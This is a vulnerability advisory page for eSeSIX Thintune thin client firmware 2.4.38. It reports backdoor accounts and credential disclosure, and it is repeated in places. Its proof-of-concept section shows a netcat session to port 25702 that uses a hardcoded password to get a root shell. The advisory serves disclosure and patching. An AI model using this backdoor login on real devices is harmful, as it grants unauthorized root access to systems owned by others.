eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
BID:10794
Info
eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
| Bugtraq ID: | 10794 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 24 2004 12:00AM |
| Updated: | Jul 24 2004 12:00AM |
| Credit: | Discovery is credited to Loss, Dirk <[email protected]>. |
| Vulnerable: |
eSeSIX Thintune XS 2.4.38 Firmware eSeSIX Thintune XM 2.4.38 Firmware eSeSIX Thintune S 2.4.38 Firmware eSeSIX Thintune Mobile 2.4.38 Firmware eSeSIX Thintune M 2.4.38 Firmware eSeSIX Thintune L 2.4.38 Firmware eSeSIX Thintune eXtreme 2.4.38 Firmware |
| Not Vulnerable: |
eSeSIX Thintune XS 2.4.39 Firmware eSeSIX Thintune XM 2.4.39 Firmware eSeSIX Thintune S 2.4.39 Firmware eSeSIX Thintune Mobile 2.4.39 Firmware eSeSIX Thintune M 2.4.39 Firmware eSeSIX Thintune L 2.4.39 Firmware eSeSIX Thintune eXtreme 2.4.39 Firmware |
Discussion
eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
Thintune Linux-based devices are reported prone to multiple vulnerabilities. These issues can allow remote attackers to gain complete access to a vulnerable device.
The issues include backdoor accounts that can be accessed over the network and an information disclosure issue that can disclose user accounts and passwords.
Thintune devices with firmware version 2.4.38 and prior are affected by these issues. Reportedly, Thintune devices based on Windows CE are not affected.
Thintune Linux-based devices are reported prone to multiple vulnerabilities. These issues can allow remote attackers to gain complete access to a vulnerable device.
The issues include backdoor accounts that can be accessed over the network and an information disclosure issue that can disclose user accounts and passwords.
Thintune devices with firmware version 2.4.38 and prior are affected by these issues. Reportedly, Thintune devices based on Windows CE are not affected.
Exploit / POC
eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
The following proof of concept examples are available:
$ nc 192.168.1.77 25702
JSRAFV-1
jstwo <- hardcoded password
+yep
shell <- one of several commands shown above
+yep here you are ...
id <- run "id" to show my privileges
uid=0(root) gid=0(root)
file:///
The following proof of concept examples are available:
$ nc 192.168.1.77 25702
JSRAFV-1
jstwo <- hardcoded password
+yep
shell <- one of several commands shown above
+yep here you are ...
id <- run "id" to show my privileges
uid=0(root) gid=0(root)
file:///
Solution / Fix
eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
Solution:
It is reported that the vendor has released firmware version 2.4.39 to address these issues. This firmware was not available to the public at the time of this report. Please contact the vendor for more information.
Solution:
It is reported that the vendor has released firmware version 2.4.39 to address these issues. This firmware was not available to the public at the time of this report. Please contact the vendor for more information.
References
eSeSIX Thintune Thin Client Devices Multiple Vulnerabilities
References:
References:
- Thintune Product Page (eSeSIX)
- eSeSIX Thintune thin client multiple vulnerabilities ("Loss, Dirk"
)